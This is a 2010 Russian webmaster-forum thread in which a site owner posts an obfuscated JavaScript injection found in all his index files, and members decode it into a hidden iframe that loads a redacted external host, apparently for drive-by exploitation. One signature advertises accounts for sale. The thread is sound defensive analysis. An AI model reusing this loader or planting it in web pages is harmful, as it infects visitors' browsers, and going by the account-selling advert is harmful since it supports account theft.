Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Бизнес-решения > Скрипты, программы и технические решения
Дата
USD/RUB58.7950
BTC/USD0.0000
Скрипты, программы и технические решения Обсуждаем скрипты, программы и новые технологии.

Закрытая тема
Опции темы Опции просмотра
Старый 16.01.2010, 06:56   #1
badguy
Страдаю приступами политических высеров.
 
Аватар для badguy
 
Регистрация: 13.09.2008
Сообщений: 335
Бабло: $81860
Wink Новый, самый свежий троянчик для ваших сайтов!

Кароче такая тема.

Какой то свежий трой прописался ко мне на ресурсы, как то по хитрому автоматом во все индекс файлы.
Пока не понятно полу автомат или автомат. И как оно туда попало.
Заебался чистить.

тут вот коллеги тоже обсуждают но пока тихо.
http://www.drupal.ru/node/39144


<script>wvan=["ocynoaxi=0;nyzibet='';for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);ocynoaxi%=0x64;for(pfhuo=0;pfhu o<wvan[1]['length'];pfhuo+=2)nyzibet+=String.fromCharCode(parseInt(0+ 'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);document.write(nyzibet );","24706c757426247a777c6126246b7b6a71686c266e796 a386c7d7568515e6a79757d257c777b6d757d766c367b6a7d7 96c7d5d747d757d766c303f717e6a79757d3f31236c7d75685 15e6a79757d366b7d6c596c6c6a717a6d6c7d303f717c3f343 f4a4b515e6a79757d3f31236c7d7568515e6a79757d366b7d6 c596c6c6a717a6d6c7d303f6b6a7b3f343f706c6c682237377 b74717b73356179767c367b777537797c377176367b7f71272 b3f31236c7d7568515e6a79757d366b6c61747d366e716b717 a7174716c61253f70717c7c7d763f236c7d7568515e6a79757 d366b6c61747d366f717c6c70253f2868603f236c7d7568515 e6a79757d366b6c61747d36707d717f706c253f2868603f235 15e6a79757d577a723825387c777b6d757d766c367a777c613 67968687d767c5b7071747c306c7d7568515e6a79757d31232 4376b7b6a71686c2624377a777c61262437706c757426"];eval(wvan[0]);</script>

Помогите расшифровать код.
Если кто тут умный
badguy вне форума  
Старый 16.01.2010, 07:13   #2
chubaka
Ебланнед
 
Регистрация: 06.06.2007
Сообщений: 154
Бабло: $5450
По умолчанию

Зашифровано хитро.
Ни во что читабельное код не разшифровывается. ИМХО браузерный экспоит какойто. Полный код получается таким:

PHP код:
<script>

wvan=["ocynoaxi=0;nyzibet='';for(pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);ocynoaxi%=0x64;for(pfhuo=0;pfhu o<wvan[1]['length'];pfhuo+=2)nyzibet+=String.fromCharCode(parseInt(0+ 'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);document.write(nyzibet );","24706c757426247a777c6126246b7b6a71686c266e796 a386c7d7568515e6a79757d257c777b6d757d766c367b6a7d7 96c7d5d747d757d766c303f717e6a79757d3f31236c7d75685 15e6a79757d366b7d6c596c6c6a717a6d6c7d303f717c3f343 f4a4b515e6a79757d3f31236c7d7568515e6a79757d366b7d6 c596c6c6a717a6d6c7d303f6b6a7b3f343f706c6c682237377 b74717b73356179767c367b777537797c377176367b7f71272 b3f31236c7d7568515e6a79757d366b6c61747d366e716b717 a7174716c61253f70717c7c7d763f236c7d7568515e6a79757 d366b6c61747d366f717c6c70253f2868603f236c7d7568515 e6a79757d366b6c61747d36707d717f706c253f2868603f235 15e6a79757d577a723825387c777b6d757d766c367a777c613 67968687d767c5b7071747c306c7d7568515e6a79757d31232 4376b7b6a71686c2624377a777c61262437706c757426"];
ocynoaxi=0;nyzibet='';
for(
pfhuo=0;pfhuo<wvan[0]['length'];pfhuo+=1)ocynoaxi+=wvan[0].charCodeAt(pfhuo);
ocynoaxi%=0x64;
for(
pfhuo=0;pfhuo<wvan[1]['length'];pfhuo+=2)
nyzibet+=String.fromCharCode(parseInt(0'x'+wvan[1].charAt(pfhuo)+wvan[1].charAt(pfhuo+1))^ocynoaxi);
alert(nyzibet); // тут смотрим результат через alert, в оригинале результат пишеться через document.write

</script> 
chubaka вне форума  
Старый 16.01.2010, 07:40   #3
badguy
Страдаю приступами политических высеров.
 
Аватар для badguy
 
Регистрация: 13.09.2008
Сообщений: 335
Бабло: $81860
ТС -->
автор темы ТС По умолчанию

там єта датастринг без пробелов идет.
Но тоже ничего не понятно
badguy вне форума  
Старый 16.01.2010, 08:07   #4
chubaka
Ебланнед
 
Регистрация: 06.06.2007
Сообщений: 154
Бабло: $5450
По умолчанию

А да точно, сорри. Но результат всеравно не понятный, никакого ифрейма и тому подобного не нашел..
chubaka вне форума  
Старый 16.01.2010, 08:41   #5
ziavra
Senior Member
 
Регистрация: 10.04.2007
Адрес: Balifor
Сообщений: 468
Бабло: $29318
По умолчанию

Дай код нормальный в личку без всяких пробелов и прочего добавленного, просто текстовым файлом.
ziavra вне форума  
Старый 16.01.2010, 08:47   #6
ziavra
Senior Member
 
Регистрация: 10.04.2007
Адрес: Balifor
Сообщений: 468
Бабло: $29318
По умолчанию

короче
PHP код:
<html><body><script>var tempIFrame=document.createElement('iframe');tempIFrame.setAttribute('id','RSIFrame');tempIFrame.setAttribute('src','http://*******.com/ad/in.cgi?3');tempIFrame.style.visibility='hidden';tempIFrame.style.width='0px';tempIFrame.style.height='0px';IFrameObj document.body.appendChild(tempIFrame);</script></body></html> 
Домен в личку отправил
ziavra вне форума  
Старый 16.01.2010, 10:33   #7
kavopero
Senior Member
 
Аватар для kavopero
 
Регистрация: 27.10.2008
Сообщений: 759
Бабло: $94811
Отправить сообщение для kavopero с помощью ICQ
По умолчанию

Это в какой то конкретный движок прописался трой или как?
kavopero вне форума  
Старый 16.01.2010, 18:37   #8
Nou
Senior Member
 
Регистрация: 11.07.2007
Сообщений: 2,074
Бабло: $134959
По умолчанию

Это давно известный способ добавления троя во все index.* файлы всех директорий на фтп. Я таких ловил ещё несколько лет назад.
Лезет через дыры в браузере, юзает тоталкоммандер (про кутефтп хз). А может и тупо сканит трафик.

Юзайте оперу, не юзайте фтп и будет вам хорошо.
Nou вне форума  
Старый 17.01.2010, 23:17   #9
BlackSeller
Юниор
 
Регистрация: 21.12.2009
Сообщений: 21
Бабло: $5190
По умолчанию

Цитата:
Сообщение от Nou Посмотреть сообщение
Юзайте оперу, не юзайте фтп и будет вам хорошо.
Любители оперы)) Давным давно ее уже ребята херачат. И чем ты будешь пользоваться оперой или ИЕ или FireFox впринципе сейчас уже не так важно.
__________________
Аккаунты от ЛЮБЫХ систем и сайтов. В наличии Yahoo(6$), Hotmail(10$), Yandex(10$), MailRu(8$), Google(20$). 804726.
BlackSeller вне форума  
Старый 18.01.2010, 00:15   #10
Tosser
Yea!
 
Аватар для Tosser
 
Регистрация: 15.02.2008
Сообщений: 2,333
Бабло: $313955
По умолчанию

экспы пробивают не оперу, и не ие, и не фф, а например пдф, или яву
__________________
Tosser вне форума  
Закрытая тема



Опции темы
Опции просмотра